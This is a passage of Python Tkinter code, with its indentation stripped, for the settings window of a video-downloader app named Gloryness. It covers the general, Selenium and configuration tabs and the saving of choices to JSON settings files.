def __init__(self, version=None, download_btn=None, done_btn=None, stabalize=None): # we need these from the main file.
self.version = version
self.download_btn = download_btn
self.done_btn = done_btn
self._stabalize = stabalize
self._title = 'Settings | Gloryness | v{}'.format(self.version)
self._icon = 'images/#app.ico'
self._size = '550x370'
def on_settings(self):
thread = threading.Thread(target=self.settings)
thread.start()
def update_apply_button(self):
self.apply_btn.configure(state=NORMAL)
self.restore_settings.configure(state=NORMAL)
def update_apply_button_with_event(self, event):
self.apply_btn.configure(state=NORMAL)
self.restore_settings.configure(state=NORMAL)
if str(self.selenium_tab['state']) == 'disabled':
with open(self.name_of_json) as f:
self.data = json.load(f)
for key, value in self.data.items():
if key == 'settings_sync':
for self.sync_sel_name, self.sync_sel_detail in value[1].items():
pass
if browser_var.get() == 'Firefox':
##
Y_CORD1 = 180
Y_CORD2 = 200
Y_CORD3 = 196
self.browser_profile_label.place(x=15, y=Y_CORD1)
self.browser_profile_entry.place(x=15, y=Y_CORD2)
self.browser_profile_button.place(x=292, y=Y_CORD3)
##
Y_CORD1 = 250
Y_CORD2 = 270
self.which_link_label.place(x=15, y=Y_CORD1)
self.which_link_entry.place(x=15, y=Y_CORD2)
else:
self.browser_profile_label.place_forget()
self.browser_profile_entry.place_forget()
self.browser_profile_button.place_forget()
##
Y_CORD1 = 180
Y_CORD2 = 200
self.which_link_label.place(x=15, y=Y_CORD1)
self.which_link_entry.place(x=15, y=Y_CORD2)
# general
def update_general_dropdowns(self):
self.update_apply_button()
if auto_fill_formats_var.get():
self.quality_dropdown.configure(state=NORMAL)
self.audio_dropdown.configure(state=NORMAL)
self.ext_dropdown.configure(state=NORMAL)
self.click_dropdown.configure(state=NORMAL)
elif not auto_fill_formats_var.get():
self.quality_dropdown.configure(state=DISABLED)
self.audio_dropdown.configure(state=DISABLED)
self.ext_dropdown.configure(state=DISABLED)
self.click_dropdown.configure(state=DISABLED)
def browse_initialdir(self):
self.update_apply_button()
if len(initialdir_var.get()) <= 2:
browse = filedialog.askdirectory(initialdir='C:/', parent=self.settings_win)
self.initialdir_entry.configure(state=NORMAL)
self.initialdir_entry.delete(0, END)
self.initialdir_entry.insert(0, browse)
self.initialdir_entry.configure(state=DISABLED)
else:
browse = filedialog.askdirectory(initialdir=initialdir_var.get(), parent=self.settings_win)
self.initialdir_entry.configure(state=NORMAL)
self.initialdir_entry.delete(0, END)
self.initialdir_entry.insert(0, browse)
self.initialdir_entry.configure(state=DISABLED)
def destination_autofill(self):
self.update_apply_button()
if len(auto_fill_destination_var.get()) <= 2:
browse = filedialog.askdirectory(initialdir='C:/', parent=self.settings_win)
self.auto_fill_destination_entry.configure(state=NORMAL)
self.auto_fill_destination_entry.delete(0, END)
self.auto_fill_destination_entry.insert(0, browse)
self.auto_fill_destination_entry.configure(state=DISABLED)
else:
browse = filedialog.askdirectory(initialdir=auto_fill_destination_var.get(), parent=self.settings_win)
self.auto_fill_destination_entry.configure(state=NORMAL)
self.auto_fill_destination_entry.delete(0, END)
self.auto_fill_destination_entry.insert(0, browse)
self.auto_fill_destination_entry.configure(state=DISABLED)
# selenium
def browse_for_path(self):
self.update_apply_button()
with open(self.name_of_json) as f:
data = json.load(f)
for key, value in data.items():
if key == 'settings':
for general_name, general_detail in value[0].items():
pass
if len(browser_path_var.get()) <= 2:
browse = filedialog.askopenfilename(initialdir=general_detail['initialdir'], title="Select WebDriver",
filetypes=(("executable files", "*.exe"), ("all files", "*.*")), parent=self.settings_win)
self.browser_path_entry.configure(state=NORMAL)
self.browser_path_entry.delete(0, END)
self.browser_path_entry.insert(0, browse)
self.browser_path_entry.configure(state=DISABLED)
else:
browse = filedialog.askopenfilename(initialdir=browser_path_var.get(), title="Select WebDriver",
filetypes=(("executable files", "*.exe"), ("all files", "*.*")), parent=self.settings_win)
self.browser_path_entry.configure(state=NORMAL)
self.browser_path_entry.delete(0, END)
self.browser_path_entry.insert(0, browse)
self.browser_path_entry.configure(state=DISABLED)
def browse_for_profile(self):
self.update_apply_button()
messagebox.showwarning("!!! BE AWARE !!!",
"Please note that if you are going to put your default profile here, please don't as it could cause harm.\n\n"
"To be safe, just create a new profile and copy everything from the default into the new one to be safe of no corruption.",
parent=self.settings_win)
with open(self.name_of_json) as f:
data = json.load(f)
for key, value in data.items():
if key == 'settings':
for general_name, general_detail in value[0].items():
pass
if len(browser_profile_var.get()) <= 2:
browse = filedialog.askdirectory(initialdir=general_detail['initialdir'], title="Select Profile", parent=self.settings_win)
self.browser_profile_entry.configure(state=NORMAL)
self.browser_profile_entry.delete(0, END)
self.browser_profile_entry.insert(0, browse)
self.browser_profile_entry.configure(state=DISABLED)
else:
browse = filedialog.askdirectory(initialdir=browser_profile_var.get(), title="Select Profile", parent=self.settings_win)
self.browser_profile_entry.configure(state=NORMAL)
self.browser_profile_entry.delete(0, END)
self.browser_profile_entry.insert(0, browse)
self.browser_profile_entry.configure(state=DISABLED)
# threading
def general_thread(self):
thread = threading.Thread(target=self.general_settings)
thread.start()
def selenium_thread(self):
thread2 = threading.Thread(target=self.selenium_settings)
thread2.start()
def config_thread(self):
thread3 = threading.Thread(target=self.configuration_settings)
thread3.start()
# settings
def delete_wigits(self):
try:
if str(self.general_tab['state']) == 'disabled':
# general
self.initialdir_label.destroy()
self.initialdir_entry.destroy()
self.initialdir_button.destroy()
self.remove_done_messagebox_check.destroy()
self.auto_fill_destination_lbl.destroy()
self.auto_fill_destination_entry.destroy()
self.auto_fill_destination_btn.destroy()
self.remove_editformats_messagebox_check.destroy()
self.auto_fill_formats_check.destroy()
self.quality_dropdown.destroy()
self.audio_dropdown.destroy()
self.ext_dropdown.destroy()
self.click_dropdown.destroy()
elif str(self.selenium_tab['state']) == 'disabled':
# selenium
self.browser_list_label.destroy()
self.browser_list.destroy()
self.browser_path_label.destroy()
self.browser_path_entry.destroy()
self.browser_path_button.destroy()
self.browser_profile_label.destroy()
self.browser_profile_entry.destroy()
self.browser_profile_button.destroy()
self.which_link_label.destroy()
self.which_link_entry.destroy()
elif str(self.config_tab['state']) == 'disabled':
# config
self.name_of_json_label.destroy()
self.name_of_json_entry.destroy()
self.dont_save_file_options_check.destroy()
self.dont_save_download_options_check.destroy()
self.dont_save_other_options_check.destroy()
except:
pass
def general_settings(self):
global initialdir_var, remove_done_messagebox_var, auto_fill_destination_var, \
remove_editformats_messagebox_var, auto_fill_formats_var, quality_dropdown_var, audio_dropdown_var, ext_dropdown_var, click_dropdown_var
json_ = JsonWorker(self.general_tab, self.selenium_tab, self.config_tab)
json_.work()
self.delete_wigits()
self.selenium_tab.config(state=NORMAL)
self.general_tab.config(state=DISABLED)
self.config_tab.config(state=NORMAL)
self.restore_settings.configure(text="Restore General Settings")
with open(self.name_of_json) as f:
self.data = json.load(f)
for key, value in self.data.items():
if key == 'settings':
for self.general_name, self.general_detail in value[0].items():
pass
for self.sel_name, self.sel_detail in value[1].items():
pass
for self.config_name, self.config_detail in value[2].items():
pass
elif key == 'settings_sync':
for self.sync_general_name, self.sync_general_detail in value[0].items():
pass
for self.sync_sel_name, self.sync_sel_detail in value[1].items():
pass
for self.sync_config_name, self.sync_config_detail in value[2].items():
pass
self.initialdir_label = Label(self.settings_win, text="When you click \"Browse\", open this folder for your initial directory:", bg='#cbdbfc')
self.initialdir_label.place(x=4, y=40)
initialdir_var = StringVar()
self.initialdir_entry = Entry(self.settings_win, width=45, state=DISABLED, relief=SOLID, textvariable=initialdir_var)
self.initialdir_entry.place(x=4, y=62)
if len(initialdir_var.get()) <= 1:
self.initialdir_entry.configure(state=NORMAL)
self.initialdir_entry.delete(0, END)
self.initialdir_entry.insert(0, self.sync_general_detail['initialdir'])
self.initialdir_entry.configure(state=DISABLED)
self.initialdir_button = ttk.Button(self.settings_win, text="Set InitialDir", style='option5_5.TButton', state=NORMAL, command=self.browse_initialdir)
self.initialdir_button.place(x=280, y=60)
remove_done_messagebox_var = BooleanVar()
self.remove_done_messagebox_check = ttk.Checkbutton(self.settings_win, text="Disable the messagebox after you click \"Done\".", style='option9.TCheckbutton',
onvalue=True, offvalue=False, variable=remove_done_messagebox_var, command=self.update_apply_button)
self.remove_done_messagebox_check.place(x=4, y=100)
remove_done_messagebox_var.set(self.sync_general_detail['disable_done_messagebox'])
self.auto_fill_destination_lbl = Label(self.settings_win, text="On loading, auto-fill the \"Destination\" to a certain destination:", bg='#cbdbfc')
self.auto_fill_destination_lbl.place(x=4, y=140)
auto_fill_destination_var = StringVar()
self.auto_fill_destination_entry = Entry(self.settings_win, width=45, state=DISABLED, relief=SOLID, textvariable=auto_fill_destination_var)
self.auto_fill_destination_entry.place(x=4, y=162)
if len(auto_fill_destination_var.get()) <= 1:
self.auto_fill_destination_entry.configure(state=NORMAL)
self.auto_fill_destination_entry.delete(0, END)
self.auto_fill_destination_entry.insert(0, self.sync_general_detail['auto_fill_destination'])
self.auto_fill_destination_entry.configure(state=DISABLED)
self.auto_fill_destination_btn = ttk.Button(self.settings_win, text="Set Auto-Fill", style='option5_5.TButton', state=NORMAL, command=self.destination_autofill)
self.auto_fill_destination_btn.place(x=280, y=160)
remove_editformats_messagebox_var = BooleanVar()
self.remove_editformats_messagebox_check = ttk.Checkbutton(self.settings_win, text="Disable the messagebox after you click \"Edit Formats\".", style='option9.TCheckbutton',
onvalue=True, offvalue=False, variable=remove_editformats_messagebox_var, command=self.update_apply_button)
self.remove_editformats_messagebox_check.place(x=4, y=200)
remove_editformats_messagebox_var.set(self.sync_general_detail['disabled_editformat_messagebox'])
auto_fill_formats_var = BooleanVar()
self.auto_fill_formats_check = ttk.Checkbutton(self.settings_win, text="On loading, auto-set all formats to chosen formats and auto-click \"Done\".", style='option9.TCheckbutton',
onvalue=True, offvalue=False, variable=auto_fill_formats_var, command=self.update_general_dropdowns)
self.auto_fill_formats_check.place(x=4, y=240)
auto_fill_formats_var.set(self.sync_general_detail['auto_format_and_click'])
quality_btn_options = [
"1080p",
"1080p",
"720p",
"480p",
"360p",
"NONE"
]
audio_btn_options = [
"1441k",
"1441k",
"800k",
"467k",
"258k",
"NONE"
]
ext_btn_options = [
"MP4",
"MP4",
"MP3",
"MKV",
"WEBM",
"WAV",
"FLV",
"M4A",
"AVI",
"OGG"
]
click_btn_options = [
"Auto-Click",
"Auto-Click",
"Don't Auto-Click"
]
quality_dropdown_var = StringVar()
self.quality_dropdown = ttk.OptionMenu(self.settings_win, quality_dropdown_var, *quality_btn_options, command=self.update_apply_button_with_event)
self.quality_dropdown.place(x=20, y=266, width=80)
quality_dropdown_var.set(self.sync_general_detail['formats'][0])
audio_dropdown_var = StringVar()
self.audio_dropdown = ttk.OptionMenu(self.settings_win, audio_dropdown_var, *audio_btn_options, command=self.update_apply_button_with_event)
self.audio_dropdown.place(x=120, y=266, width=80)
audio_dropdown_var.set(self.sync_general_detail['formats'][1])
ext_dropdown_var = StringVar()
self.ext_dropdown = ttk.OptionMenu(self.settings_win, ext_dropdown_var, *ext_btn_options, command=self.update_apply_button_with_event)
self.ext_dropdown.place(x=220, y=266, width=80)
ext_dropdown_var.set(self.sync_general_detail['formats'][2])
click_dropdown_var = StringVar()
self.click_dropdown = ttk.OptionMenu(self.settings_win, click_dropdown_var, *click_btn_options, command=self.update_apply_button_with_event)
self.click_dropdown.place(x=320, y=266, width=130)
click_dropdown_var.set(self.sync_general_detail['formats'][3])
if auto_fill_formats_var.get():
self.quality_dropdown.configure(state=NORMAL)
self.audio_dropdown.configure(state=NORMAL)
self.ext_dropdown.configure(state=NORMAL)
self.click_dropdown.configure(state=NORMAL)
elif not auto_fill_formats_var.get():
self.quality_dropdown.configure(state=DISABLED)
self.audio_dropdown.configure(state=DISABLED)
self.ext_dropdown.configure(state=DISABLED)
self.click_dropdown.configure(state=DISABLED)
def selenium_settings(self):
global browser_var, browser_path_var, browser_profile_var, which_link_var
json_ = JsonWorker(self.general_tab, self.selenium_tab, self.config_tab)
json_.work()
self.delete_wigits()
self.selenium_tab.config(state=DISABLED)
self.general_tab.config(state=NORMAL)
self.config_tab.config(state=NORMAL)
self.restore_settings.configure(text="Restore Selenium Settings")
with open(self.name_of_json) as f:
self.data = json.load(f)
for key, value in self.data.items():
if key == 'settings':
for self.general_name, self.general_detail in value[0].items():
pass
for self.sel_name, self.sel_detail in value[1].items():
pass
for self.config_name, self.config_detail in value[2].items():
pass
elif key == 'settings_sync':
for self.sync_general_name, self.sync_general_detail in value[0].items():
pass
for self.sync_sel_name, self.sync_sel_detail in value[1].items():
pass
for self.sync_config_name, self.sync_config_detail in value[2].items():
pass
##
self.browser_list_label = Label(self.settings_win, text="Preferred Browser: (REQUIRED)", bg='#cbdbfc')
self.browser_list_label.place(x=15, y=40)
self.browsers = [
'Firefox',
'Firefox',
'Chrome',
'Safari',
'Opera',
'Edge',
'Internet Explorer'
]
browser_var = StringVar()
self.browser_list = ttk.OptionMenu(self.settings_win, browser_var, *self.browsers, command=self.update_apply_button_with_event)
self.browser_list.place(x=15, y=65, width=120)
browser_var.set(self.sync_sel_detail['browser'])
##
self.browser_path_label = Label(self.settings_win, text="PATH directory for WebDriver: (REQUIRED)", bg='#cbdbfc')
self.browser_path_label.place(x=15, y=110)
browser_path_var = StringVar()
self.browser_path_entry = Entry(self.settings_win, width=45, state=DISABLED, relief=SOLID, textvariable=browser_path_var)
self.browser_path_entry.place(x=15, y=130)
self.browser_path_button = ttk.Button(self.settings_win, text="Set PATH", style='option5_5.TButton', state=NORMAL, command=self.browse_for_path)
self.browser_path_button.place(x=292, y=126)
##
Y_CORD1 = 180
Y_CORD2 = 200
Y_CORD3 = 196
self.browser_profile_label = Label(self.settings_win, text="PATH directory for Firefox Profile: (OPTIONAL)", bg='#cbdbfc')
self.browser_profile_label.place(x=15, y=Y_CORD1)
browser_profile_var = StringVar()
self.browser_profile_entry = Entry(self.settings_win, width=45, state=DISABLED, relief=SOLID, textvariable=browser_profile_var)
self.browser_profile_entry.place(x=15, y=Y_CORD2)
self.browser_profile_button = ttk.Button(self.settings_win, text="Set PROFILE", style='option5_5.TButton', state=NORMAL, command=self.browse_for_profile)
self.browser_profile_button.place(x=292, y=Y_CORD3)
if self.sync_sel_detail['browser'] != 'Firefox':
self.browser_profile_label.place_forget()
self.browser_profile_entry.place_forget()
self.browser_profile_button.place_forget()
##
Y_CORD1 = 180
Y_CORD2 = 200
if self.sync_sel_detail['browser'] == 'Firefox':
Y_CORD1 = 250
Y_CORD2 = 270
self.which_link_label = Label(self.settings_win, text="Enter which link to load when selenium is open: (default: https://www.youtube.com/)", bg='#cbdbfc')
self.which_link_label.place(x=15, y=Y_CORD1)
which_link_var = StringVar()
self.which_link_entry = Entry(self.settings_win, width=45, state=NORMAL, relief=SOLID, textvariable=which_link_var)
self.which_link_entry.place(x=15, y=Y_CORD2)
self.which_link_entry.bind("<Key>", self.update_apply_button_with_event)
##
if len(which_link_var.get()) <= 1:
self.which_link_entry.delete(0, END)
self.which_link_entry.insert(0, self.sync_sel_detail['link'])
if len(browser_path_var.get()) <= 1:
self.browser_path_entry.configure(state=NORMAL)
self.browser_path_entry.delete(0, END)
self.browser_path_entry.insert(0, self.sync_sel_detail['path'])
self.browser_path_entry.configure(state=DISABLED)
if len(browser_profile_var.get()) <= 1:
self.browser_profile_entry.configure(state=NORMAL)
self.browser_profile_entry.delete(0, END)
self.browser_profile_entry.insert(0, self.sync_sel_detail['profile'])
self.browser_profile_entry.configure(state=DISABLED)
def configuration_settings(self):
global name_of_json_var, dont_save_file_options_var, dont_save_download_options_var, dont_save_other_options_var
json_ = JsonWorker(self.general_tab, self.selenium_tab, self.config_tab)
json_.work()
self.delete_wigits()
self.selenium_tab.config(state=NORMAL)
self.general_tab.config(state=NORMAL)
self.config_tab.config(state=DISABLED)
self.restore_settings.configure(text="Restore Config Settings")
with open(self.name_of_json) as f:
self.data = json.load(f)
for key, value in self.data.items():
if key == 'settings':
for self.general_name, self.general_detail in value[0].items():
pass
for self.sel_name, self.sel_detail in value[1].items():
pass
for self.config_name, self.config_detail in value[2].items():
pass
elif key == 'settings_sync':
for self.sync_general_name, self.sync_general_detail in value[0].items():
pass
for self.sync_sel_name, self.sync_sel_detail in value[1].items():
pass
for self.sync_config_name, self.sync_config_detail in value[2].items():
pass
self.name_of_json_label = Label(self.settings_win, text="Name of the .JSON file: (default: settings.json)", bg='#cbdbfc')
self.name_of_json_label.place(x=15, y=40)
name_of_json_var = StringVar()
self.name_of_json_entry = Entry(self.settings_win, width=45, state=NORMAL, relief=SOLID, textvariable=name_of_json_var)
self.name_of_json_entry.place(x=15, y=60)
self.name_of_json_entry.bind("<Key>", self.update_apply_button_with_event)
if len(name_of_json_var.get()) <= 1:
self.name_of_json_entry.delete(0, END)
self.name_of_json_entry.insert(0, self.sync_config_detail['name'])
dont_save_file_options_var = BooleanVar()
self.dont_save_file_options_check = ttk.Checkbutton(self.settings_win, text="Don't save File Options to .JSON", style='option9.TCheckbutton',
onvalue=True, offvalue=False, variable=dont_save_file_options_var, command=self.update_apply_button)
self.dont_save_file_options_check.place(x=15, y=110)
dont_save_file_options_var.set(self.sync_config_detail['dont_save_file_options'])
dont_save_download_options_var = BooleanVar()
self.dont_save_download_options_check = ttk.Checkbutton(self.settings_win, text="Don't save Download Options to .JSON", style='option9.TCheckbutton',
onvalue=True, offvalue=False, variable=dont_save_download_options_var, command=self.update_apply_button)
self.dont_save_download_options_check.place(x=15, y=140)
dont_save_download_options_var.set(self.sync_config_detail['dont_save_download_options'])
dont_save_other_options_var = BooleanVar()
self.dont_save_other_options_check = ttk.Checkbutton(self.settings_win, text="Don't save Other Options to .JSON", style='option9.TCheckbutton',
onvalue=True, offvalue=False, variable=dont_save_other_options_var, command=self.update_apply_button)
self.dont_save_other_options_check.place(x=15, y=170)
dont_save_other_options_var.set(self.sync_config_detail['dont_save_other_options'])
@property
def name_of_json(self):
with open('temp.json') as f:
data = json.load(f)
return data['name']
def restore(self):
if str(self.general_tab['state']) == 'disabled':
self.initialdir_entry.configure(state=NORMAL)
self.auto_fill_destination_entry.configure(state=NORMAL)
self.initialdir_entry.delete(0, END)
self.auto_fill_destination_entry.delete(0, END)
remove_done_messagebox_var.set(False)
auto_fill_destination_var.set('')
remove_editformats_messagebox_var.set(False)
auto_fill_formats_var.set(False)
self.quality_dropdown.configure(state=NORMAL); self.audio_dropdown.configure(state=NORMAL); self.ext_dropdown.configure(state=NORMAL); self.click_dropdown.configure(state=NORMAL)
quality_dropdown_var.set("1080p")
audio_dropdown_var.set("1441k")
ext_dropdown_var.set("MP4")
click_dropdown_var.set("Auto-Click")
self.quality_dropdown.configure(state=DISABLED); self.audio_dropdown.configure(state=DISABLED); self.ext_dropdown.configure(state=DISABLED); self.click_dropdown.configure(state=DISABLED)
self.initialdir_entry.configure(state=DISABLED)
self.auto_fill_destination_entry.configure(state=DISABLED)
elif str(self.selenium_tab['state']) == 'disabled':
browser_var.set('Firefox')
self.browser_path_entry.configure(state=NORMAL)
self.browser_path_entry.delete(0, END)
self.browser_path_entry.configure(state=DISABLED)
self.browser_profile_entry.configure(state=NORMAL)
self.browser_profile_entry.delete(0, END)
self.browser_profile_entry.configure(state=DISABLED)
self.which_link_entry.delete(0, END)
self.which_link_entry.insert(0, "https://www.youtube.com/")
elif str(self.config_tab['state']) == 'disabled':
self.name_of_json_entry.delete(0, END)
self.name_of_json_entry.insert(0, 'settings.json')
dont_save_file_options_var.set(False)
dont_save_download_options_var.set(False)
dont_save_other_options_var.set(False)
self.apply_btn.configure(state=NORMAL)
self.restore_settings.configure(state=DISABLED)
def settings(self):
if self._stabalize[3] == 1:
self.download_btn.configure(state=DISABLED)
self.settings_win = Toplevel()
self.settings_win.title(self._title)
self.settings_win.iconbitmap(self._icon)
self.settings_win.resizable(False, False)
self.settings_win.configure(bg='#cbdbfc', bd=5)
self.settings_win.geometry(self._size)
self.settings_win.protocol("WM_DELETE_WINDOW", lambda: reset_settings_window(self.settings_win, self.download_btn, self.done_btn, self._stabalize, self.apply_btn))
border = LabelFrame(self.settings_win, height=368.5, width=549.5, bg='#cbdbfc', bd=4, font="Cooper 18", labelanchor=N, relief=SOLID)
border.place(x=-5, y=-4)
style21 = ttk.Style()
style21.configure('option5_5.TButton', background='black', width=12)
style21.configure('option6.TButton', background='black', width=7)
style21.configure('option7.TButton', background='black', width=22)
style21.configure('option8.TButton', background='black', width=20, borderwidth=1, focusthickness=3)
style21.map('option8.TButton', background=[('active', '#d2d2d2')])
style21.configure('option9.TCheckbutton', background='#cbdbfc')
self.selenium_tab = ttk.Button(self.settings_win, text="Selenium Settings", style='option8.TButton', state=NORMAL, command=self.selenium_thread)
self.selenium_tab.place(x=75, y=2)
self.general_tab = ttk.Button(self.settings_win, text="General Settings", style='option8.TButton', state=NORMAL, command=self.general_thread)
self.general_tab.place(x=205, y=2)
self.config_tab = ttk.Button(self.settings_win, text="Configuration Settings", style='option8.TButton', state=NORMAL, command=self.config_thread)
self.config_tab.place(x=335, y=2)
self.restore_settings = ttk.Button(self.settings_win, text="", style='option7.TButton', state=NORMAL, command=self.restore, width=25)
self.restore_settings.place(x=1, y=335)
self.apply_btn = ttk.Button(self.settings_win, text="Apply", state=DISABLED, style='option6.TButton', command=self.apply_settings)
self.apply_btn.place(x=488, y=335)
exit_btn = ttk.Button(self.settings_win, text="Exit", style='option6.TButton',
command=lambda: reset_settings_window(self.settings_win, self.download_btn, self.done_btn, self._stabalize, self.apply_btn))
exit_btn.place(x=418, y=335)
self.general_settings()
for index, var in enumerate(self._stabalize):
self._stabalize[index] += 1
print(self._stabalize)
def hold_variables(self, apply_btn, win):
with open(self.name_of_json) as f:
self.data = json.load(f)
for key, value in self.data.items():
if key == 'settings':
for self.general_name, self.general_detail in value[0].items():
pass
for self.sel_name, self.sel_detail in value[1].items():
pass
for self.config_name, self.config_detail in value[2].items():
pass
elif key == 'settings_sync':
for self.sync_general_name, self.sync_general_detail in value[0].items():
pass
for self.sync_sel_name, self.sync_sel_detail in value[1].items():
pass
for self.sync_config_name, self.sync_config_detail in value[2].items():
pass
if str(apply_btn['state']) == 'normal':
choice = messagebox.askyesno("???", "You have unsaved changes.\nAre you sure you want to Exit?", parent=win)
if choice == 1:
self.sync_general_detail['initialdir'] = self.general_detail['initialdir']
self.sync_general_detail['disable_done_messagebox'] = self.general_detail['disable_done_messagebox']
self.sync_general_detail['auto_fill_destination'] = self.general_detail['auto_fill_destination']
self.sync_general_detail['disabled_editformat_messagebox'] = self.general_detail['disabled_editformat_messagebox']
self.sync_general_detail['auto_format_and_click'] = self.general_detail['auto_format_and_click']
self.sync_general_detail['formats'][0] = self.general_detail['formats'][0]
self.sync_general_detail['formats'][1] = self.general_detail['formats'][1]
self.sync_general_detail['formats'][2] = self.general_detail['formats'][2]
self.sync_general_detail['formats'][3] = self.general_detail['formats'][3]
self.sync_sel_detail['browser'] = self.sel_detail['browser']
self.sync_sel_detail['path'] = self.sel_detail['path']
self.sync_sel_detail['profile'] = self.sel_detail['profile']
self.sync_sel_detail['link'] = self.sel_detail['link']
self.sync_config_detail['name'] = self.config_detail['name']
self.sync_config_detail['dont_save_file_options'] = self.config_detail['dont_save_file_options']
self.sync_config_detail['dont_save_download_options'] = self.config_detail['dont_save_download_options']
self.sync_config_detail['dont_save_other_options'] = self.config_detail['dont_save_other_options']
with open('settings.json', 'w') as f:
json.dump(self.data, f, indent=3)
win.destroy()
else:
pass
else:
win.destroy()
def apply_settings(self):
with open(self.name_of_json) as f:
self.data = json.load(f)
with open('temp.json') as d:
other_data = json.load(d)
for key, value in self.data.items():
if key == 'settings':
for self.general_name, self.general_detail in value[0].items():
pass
for self.sel_name, self.sel_detail in value[1].items():
pass
for self.config_name, self.config_detail in value[2].items():
pass
elif key == 'settings_sync':
for self.sync_general_name, self.sync_general_detail in value[0].items():
pass
for self.sync_sel_name, self.sync_sel_detail in value[1].items():
pass
for self.sync_config_name, self.sync_config_detail in value[2].items():
pass
# if a change was made on the current tab without switching tabs, the if statements below save it here instead
if str(self.general_tab['state']) == 'disabled':
self.sync_general_detail['initialdir'] = initialdir_var.get()
self.sync_general_detail['disable_done_messagebox'] = remove_done_messagebox_var.get()
self.sync_general_detail['auto_fill_destination'] = auto_fill_destination_var.get()
self.sync_general_detail['disabled_editformat_messagebox'] = remove_editformats_messagebox_var.get()
self.sync_general_detail['auto_format_and_click'] = auto_fill_formats_var.get()
self.sync_general_detail['formats'][0] = quality_dropdown_var.get()
self.sync_general_detail['formats'][1] = audio_dropdown_var.get()
self.sync_general_detail['formats'][2] = ext_dropdown_var.get()
self.sync_general_detail['formats'][3] = click_dropdown_var.get()
elif str(self.selenium_tab['state']) == 'disabled':
self.sync_sel_detail['browser'] = browser_var.get()
self.sync_sel_detail['path'] = browser_path_var.get()
self.sync_sel_detail['profile'] = browser_profile_var.get()
self.sync_sel_detail['link'] = which_link_var.get()
elif str(self.config_tab['state']) == 'disabled':
self.sync_config_detail['name'] = name_of_json_var.get()
self.sync_config_detail['dont_save_file_options'] = dont_save_file_options_var.get()
self.sync_config_detail['dont_save_download_options'] = dont_save_download_options_var.get()
self.sync_config_detail['dont_save_other_options'] = dont_save_other_options_var.get()
if self.sync_config_detail['name'].endswith('.json'):
# saving it to the actual settings dict
self.general_detail['initialdir'] = self.sync_general_detail['initialdir']
self.general_detail['disable_done_messagebox'] = self.sync_general_detail['disable_done_messagebox']
self.general_detail['auto_fill_destination'] = self.sync_general_detail['auto_fill_destination']
self.general_detail['disabled_editformat_messagebox'] = self.sync_general_detail['disabled_editformat_messagebox']
self.general_detail['auto_format_and_click'] = self.sync_general_detail['auto_format_and_click']
self.general_detail['formats'][0] = self.sync_general_detail['formats'][0]
self.general_detail['formats'][1] = self.sync_general_detail['formats'][1]
self.general_detail['formats'][2] = self.sync_general_detail['formats'][2]
self.general_detail['formats'][3] = self.sync_general_detail['formats'][3]
self.sel_detail['browser'] = self.sync_sel_detail['browser']
self.sel_detail['path'] = self.sync_sel_detail['path']
self.sel_detail['profile'] = self.sync_sel_detail['profile']
self.sel_detail['link'] = self.sync_sel_detail['link']
self.config_detail['name'] = self.sync_config_detail['name']
self.config_detail['dont_save_file_options'] = self.sync_config_detail['dont_save_file_options']
self.config_detail['dont_save_download_options'] = self.sync_config_detail['dont_save_download_options']
self.config_detail['dont_save_other_options'] = self.sync_config_detail['dont_save_other_options']
other_data.update(prev_name=other_data.get('name'))
other_data.update(name=self.config_detail['name'])
# saving to file
with open(other_data.get('prev_name'), 'w') as f:
json.dump(self.data, f, indent=3)
f.close()
with open('temp.json', 'w') as d:
json.dump(other_data, d, indent=3)
d.close()
# renaming the file if necessary
if other_data.get('prev_name') and other_data.get('name') != 'settings.json':
os.rename(other_data.get('prev_name'), other_data.get('name'))
self.apply_btn.configure(state=DISABLED)
else:
messagebox.showwarning("???", "JSON filename must end with '.json'", parent=self.settings_win)
# noinspection PyUnresolvedReferences
class JsonWorker(SettingsWindow):
def __init__(self, general, selenium, config, version=None, download_btn=None, done_btn=None, stabalize=None):
SettingsWindow.__init__(self, version, download_btn, done_btn, stabalize)
self.general = general
self.selenium = selenium
self.config = config
with open(self.name_of_json) as f:
self.data = json.load(f)
for key, value in self.data.items():
if key == 'settings':
for self.general_name, self.general_detail in value[0].items():
pass
for self.sel_name, self.sel_detail in value[1].items():
pass
for self.config_name, self.config_detail in value[2].items():
pass
elif key == 'settings_sync':
for self.sync_general_name, self.sync_general_detail in value[0].items():
pass
for self.sync_sel_name, self.sync_sel_detail in value[1].items():
pass
for self.sync_config_name, self.sync_config_detail in value[2].items():
pass
def work(self):
if str(self.general['state']) == 'disabled':
self.work_general()
if str(self.selenium['state']) == 'disabled':
self.work_selenium()
if str(self.config['state']) == 'disabled':
self.work_config()
# saving to file
with open(self.name_of_json, 'w') as f:
json.dump(self.data, f, indent=3)
def work_general(self):
if initialdir_var.get() != self.sync_general_detail['initialdir']:
self.sync_general_detail['initialdir'] = initialdir_var.get()
if remove_done_messagebox_var.get() != self.sync_general_detail['disable_done_messagebox']:
self.sync_general_detail['disable_done_messagebox'] = remove_done_messagebox_var.get()
if auto_fill_destination_var.get() != self.sync_general_detail['auto_fill_destination']:
self.sync_general_detail['auto_fill_destination'] = auto_fill_destination_var.get()
if remove_editformats_messagebox_var.get() != self.sync_general_detail['disabled_editformat_messagebox']:
self.sync_general_detail['disabled_editformat_messagebox'] = remove_editformats_messagebox_var.get()
if auto_fill_formats_var.get() != self.sync_general_detail['auto_format_and_click']:
self.sync_general_detail['auto_format_and_click'] = auto_fill_formats_var.get()
if auto_fill_formats_var.get():
if quality_dropdown_var.get() != self.sync_general_detail['formats'][0]:
self.sync_general_detail['formats'][0] = quality_dropdown_var.get()
if audio_dropdown_var.get() != self.sync_general_detail['formats'][1]:
self.sync_general_detail['formats'][1] = audio_dropdown_var.get()
if ext_dropdown_var.get() != self.sync_general_detail['formats'][2]:
self.sync_general_detail['formats'][2] = ext_dropdown_var.get()
if click_dropdown_var.get() != self.sync_general_detail['formats'][3]:
self.sync_general_detail['formats'][3] = click_dropdown_var.get()
def work_selenium(self):
if browser_var.get() != self.sync_sel_detail['browser']:
self.sync_sel_detail['browser'] = browser_var.get()
if browser_path_var.get() != self.sync_sel_detail['path']:
self.sync_sel_detail['path'] = browser_path_var.get()
if self.sync_sel_detail['browser'] == 'Firefox':
if browser_profile_var.get() != self.sync_sel_detail['profile']:
self.sync_sel_detail['profile'] = browser_profile_var.get()
if which_link_var.get() != self.sync_sel_detail['link']:
self.sync_sel_detail['link'] = which_link_var.get()
def work_config(self):
if name_of_json_var.get() != self.sync_config_detail['name']:
self.sync_config_detail['name'] = name_of_json_var.get()
if dont_save_file_options_var.get() != self.sync_config_detail['dont_save_file_options']:
